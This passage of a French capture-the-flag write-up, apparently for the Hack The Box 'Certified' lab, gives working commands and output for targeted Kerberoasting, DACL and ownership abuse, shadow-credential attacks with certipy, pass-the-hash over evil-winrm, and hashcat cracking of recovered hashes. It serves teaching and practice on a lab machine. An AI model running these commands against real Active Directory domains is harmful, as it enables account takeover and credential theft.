</span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> computers </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">10</span> users </span></span><span class="line"><span class="cl">INFO: Found <span class="m">53</span> groups </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> gpos </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> ous </span></span><span class="line"><span class="cl">INFO: Found <span class="m">19</span> containers </span></span><span class="line"><span class="cl">INFO: Found <span class="m">0</span> trusts </span></span><span class="line"><span class="cl">INFO: Starting computer enumeration with <span class="m">10</span> workers </span></span><span class="line"><span class="cl">INFO: Querying computer: </span></span><span class="line"><span class="cl">INFO: Querying computer: DC01.certified.htb </span></span><span class="line"><span class="cl">INFO: Done in 00M 07S </span></span><span class="line"><span class="cl">INFO: Compressing output into 20241208115439_bloodhound.zip </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="targeted-kerberoasting">Targeted Kerberoasting </h3><p>D&rsquo;après ce qu&rsquo;on observe sur bloodhound, on peut voir que l&rsquo;utilisateur <code>management_svc</code> peut potentiellement être récupéré à l&rsquo;aide d&rsquo;une attaque &ldquo;targeted Kerberoasting&rdquo;. A l&rsquo;aide de l&rsquo;outil <code>targetedKerberoast.py</code>, on effectue l&rsquo;attaque et on récupére le hash du mot de passe de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 -v </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting kerberoast attacks </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Fetching usernames from Active Directory with LDAP </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Printing <span class="nb">hash</span> <span class="k">for</span> <span class="o">(</span>management_svc<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$krb5tgs$23$*</span>management_svc<span class="nv">$CERTIFIED</span>.HTB<span class="nv">$certified</span>.htb/management_svc*<span class="nv">$98</span>e6a7443e6760f44cdd6b7a9ff0cdc8<span class="nv">$21</span>d6889b72b0eae33c5f4eb81af29e699b45b48284cde10ae2fdc23a1c929a5f5ccb8c88ef7c9a6f14552b848d42791d0c4f0827621e3fbd06abfb0fe5d41b2754443a76c8abe11350c929d8b6251f927222c0f1c7339620a15866b2f3714d5ab15cdb2893b13daf6db594aa4259d89028198d886c697997cc443afe9f8a09361736573565ebfa264a03c5d00ffb2377898d0c6087385d3b895ecb7e5ae11ac37875409b1bb574350707d049e5aad147b5a36c1172ea4d4deb2f7c62e5bfb75edcbb475e59a34ee8255b9262b39449625a05185526829e7437e9078253741d3bcb130325ad4e07ca41a2436a29020d467f67e4ff16e5be22a04b30317be8dc773f11374aabea10e4e669146698d0c558a060e27ac55554121cc26d7050172044810850793699c631a46cb33af8650b940c3b7676bd397c47cd7b27dd62f15d2b4fe8ca2c741bad98335af2be77ec06317d2ca3e5fb32bad8c3cc599cc2f62fc5a3e1124501ca010fe529d00e87babcaadbb8fb331d9027c999c9d30ad828613f25e782acc721d3842db14020713fcddded15996c195da468a14aa2cf2595f94c305d68d25d91579ec569e226627f15b0b7c5df2fd4306a8b5425e553711f321f3f40d0e9d65bcf77d20db59fea66a66b01ff383af30e7541ace8c20266199fd9ea56a54a5aade2859bd463b386eb754a8eb2c7202b3575adc3e1d8fb9231d93fab04039d4a7f07a9b79ffe00fa9c5c786404c68742e822a84af136cd472f6168621dfa4817312bdc08eb5e070a69842b15bbbea8a503f101043e1981cda2e0df4008c52d41b0e2805d8616c08b025eea8fc230b1b983322be2060f18da2ee9d832769ef53dcbd6d27bed287c55ed73be5678e21f52c4d3703a90d65a340e573648f43bf60a8194975516d2e70b69522f24d4aa713a20ba0d84efa776eb7886113456c77cb1cb535cb741ff651caf111ecec2f8d63a37d544035e2acf72298024415ee49f00037ee3e0a5653643a48675d355c7fd911f728fa3b9933c14919828bc74e689c523c7602a03413105f8c8aee518c6458ad4f2fcdcc8859ebca960a39b37987c7ac6a8d3f0bb8ca06b82f7e3afc3bb0d9777e852fb0a6ccdaf9a7897632d5c1ff7a7524f1ccd06da51b1ffeaeeca9b1b9ef827b7ec9de56af9af28093990983c4bc1543229c1b886b802286d606aca8fd2f1decc07b25f241fdd287975d6db4d32e472ae89700764a5e5a5cefb977ac106431fa8f435bf2c420a00528aaaa9237a286ff433be4ce8eb458cdcab450003ee0c5d49ce6c069cc40c48ed721c3a07b42e470991321b322475f9aef94c3e488b62289793fb3dac6c56cad4ebb95189c8864d2b7425047f5e4fd8f71d029f6e7df1caea05089da8a024bca18c34d92c52cb5d2bc19a4578ec9e872285fccabbdf54cff68968cff90ac592f247928bd27fcbb89b45a75ae00351ca654b9a978c213e52bbca509eeb5c34c520f94c5d394b2dee91988bddb8d7a6e1f61732d961c42ad33b76b46122f2e4a55dce6abf450d64180b6ff2394a59418668bf79f6d34af701fd1e98 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credential-attack">Shadow credential attack </h3><ul> <li>Grant ownership : It has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object. The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. On va donc rendre judith.mader owner du groupe</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 owneredit.py -new-owner <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> -dc-ip 10.10.11.41 -action write <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Current owner information below </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - SID: S-1-5-21-729746778-2675978091-3820388244-512 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - sAMAccountName: Domain Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> - distinguishedName: <span class="nv">CN</span><span class="o">=</span>Domain Admins,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> OwnerSid modified successfully! </span></span></code></pre></td></tr></table> </div> </div><p>Puis :</p> <ul> <li>Modifying the rights To abuse ownership of a group object, you may grant yourself the AddMember privilege.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;WriteMembers&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL backed up to dacledit-20241209-130331.bak </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DACL modified successfully! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Cependant, après verification ca n&#39;a pas fonctionné. Par contre j&#39;ai pu me donner le controle totale a l&#39;aide de cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;write&#39;</span> -rights <span class="s1">&#39;FullControl&#39;</span> -principal <span class="s1">&#39;judith.mader&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Pour vérifier les droits des utilisateur sur un groupe/objet, on peut utiliser cette commande</span> </span></span><span class="line"><span class="cl">dacledit.py -action <span class="s1">&#39;read&#39;</span> -target <span class="s1">&#39;management&#39;</span> <span class="s1">&#39;certified.htb&#39;</span>/<span class="s1">&#39;judith.mader&#39;</span>:<span class="s1">&#39;judith09&#39;</span> <span class="p">|</span> grep judith -A <span class="m">3</span> -B <span class="m">3</span> </span></span></code></pre></td></tr></table> </div> </div><p>Enfin :</p> <ul> <li>Adding to the group You can now add members to the group. On va donc s&rsquo;ajouter comme membre du groupe : judith.mader.</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">net rpc group addmem <span class="s2">&#34;management&#34;</span> <span class="s2">&#34;judith.mader&#34;</span> -U <span class="s2">&#34;certified.htb&#34;</span>/<span class="s2">&#34;judith.mader&#34;</span>%<span class="s2">&#34;judith09&#34;</span> -S <span class="s2">&#34;certified.htb&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Maintenant que judith.mader est membre du groupe, on va enfin pouvoir faire une &lsquo;shadow credential attack&rsquo; pour obtenir le hash NT de <code>management_svc</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41 -account management_svc -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate generated </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Generating Key Credential </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Key Credential generated with DeviceID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> </span></span><span class="line"><span class="cl">&lt;KeyCredential structure at 0x7f711d6a6900&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> Owner: <span class="nv">CN</span><span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"> <span class="p">|</span> Version: 0x200 </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyID: KcbU1P0bMaVuWjpricPI4cNFK5+qjRkV4gYbM4DfPP0<span class="o">=</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> KeyHash: 64a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d </span></span><span class="line"><span class="cl"> <span class="p">|</span> RawKeyMaterial: &lt;dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f711d6a68a0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Exponent <span class="o">(</span>E<span class="o">)</span>: <span class="m">65537</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Modulus <span class="o">(</span>N<span class="o">)</span>: 0x920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e69 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime1 <span class="o">(</span>P<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Prime2 <span class="o">(</span>Q<span class="o">)</span>: 0x0 </span></span><span class="line"><span class="cl"> <span class="p">|</span> Usage: KeyUsage.NGC </span></span><span class="line"><span class="cl"> <span class="p">|</span> LegacyUsage: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> Source: KeySource.AD </span></span><span class="line"><span class="cl"> <span class="p">|</span> DeviceId: 8438746f-c951-b3d9-9be0-c455cedf6731 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CustomKeyInfo: &lt;CustomKeyInformation at 0x7f711d6968f0&gt; </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Version: <span class="m">1</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Flags: KeyFlags.NONE </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> VolumeType: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> SupportsNotification: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> FekKeyVersion: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Strength: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> Reserved: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> <span class="p">|</span> EncodedExtendedCKI: None </span></span><span class="line"><span class="cl"> <span class="p">|</span> LastLogonTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"> <span class="p">|</span> CreationTime <span class="o">(</span>UTC<span class="o">)</span>: 2024-12-10 04:23:52.735565 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Key Credential: B:828:0002000020000129c6d4d4fd1b31a56e5a3a6b89c3c8e1c3452b9faa8d1915e2061b3380df3cfd20000264a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d1b0103525341310008000003000000000100000000000000000000010001920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e6901000401010005001000066f74388451c9d9b39be0c455cedf67310200070100080008fb78af51bb4adb01080009fb78af51bb4adb01:CN<span class="o">=</span>management service,CN<span class="o">=</span>Users,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Adding Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully added Key Credential with device ID <span class="s1">&#39;8438746f-c951-b3d9-9be0-c455cedf6731&#39;</span> to the Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Authenticating as <span class="s1">&#39;management_svc&#39;</span> with the certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: management_svc@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;management_svc.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Restoring the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;management_svc&#39;</span>: a091c1832bcdd4677c28b5a6a1295584 </span></span></code></pre></td></tr></table> </div> </div><p>On obtient le hachage NT pour l&rsquo;utilisateur management_svc !</p> <h3 id="winrm-connexion-avec-le-hachage-nt-pass-the-hash---user-flag">WinRm connexion avec le hachage NT (Pass-The-Hash) - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>anagement_svc<span class="se">\D</span>esktop&gt; cat user.txt </span></span><span class="line"><span class="cl">423f.....d084 </span></span></code></pre></td></tr></table> </div> </div><h3 id="shadow-credentials-attack--management_svc---ca_operator">Shadow Credentials attack : management_svc -&gt; ca_operator </h3><p>On effectue à nouveau une shadow credential attack pour récupérer le hachage NT de l&rsquo;utilisateur <code>ca_operator</code>. Pour cela on utilise l&rsquo;utilisateur management_svc avec son hachage NT (option <code>-hashes</code> au lieu du mot de passe qu&rsquo;on ne connait <code>-p</code>) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -account ca_operator -debug </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Targeting user <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully restored the old Key Credentials <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;ca_operator&#39;</span>: 13b29964cc2480b4ef454c59562e675c </span></span></code></pre></td></tr></table> </div> </div><p>### Nouveau bloodhound avec l&rsquo;utilisateur ca_operator</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;ca_operator&#39;</span> -p <span class="s1">&#39;P@ssword&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span></code></pre></td></tr></table> </div> </div><h3 id="bruteforce-hashcat-du-hachage-nt">Bruteforce hashcat du hachage NT </h3><p>On obtient le mot de passe de l&rsquo;utilisateur <code>ca_operator</code> grâce à hashcat et la wordlist <code>rockyou.txt</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">1000</span> -a <span class="m">0</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">13b29964cc2480b4ef454c59562e675c:P@ssword </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="bloodhound-pe-path">Bloodhound PE Path </h3><p><img src="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1.png" width="884" height="646" srcset="https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_b419142d57acff50.png 480w, https://leopoldabgn.github.io/writeups/p/certified-htb/AD1_hu_3d86e4be04c7c92a.png 1024w" loading="lazy" alt="AD" class="gallery-image" data-flex-grow="136" data-flex-basis="328px" ></p> <h3 id="checking-vuln-in-certificates--templates-with-ca_operator">Checking vuln in certificates / templates with ca_operator </h3><p>On observe que management_svc à le droit CanPSRemote sur la machine DC01 :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad find -vulnerable -stdout -u ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327:94994b74f29662fc4d702f2f3b0df327 -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Adding Domain Computers to list of current user<span class="s1">&#39;s SIDs </span></span></span><span class="line"><span class="cl"><span class="s1">[+] List of current user&#39;</span>s SIDs: </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Users <span 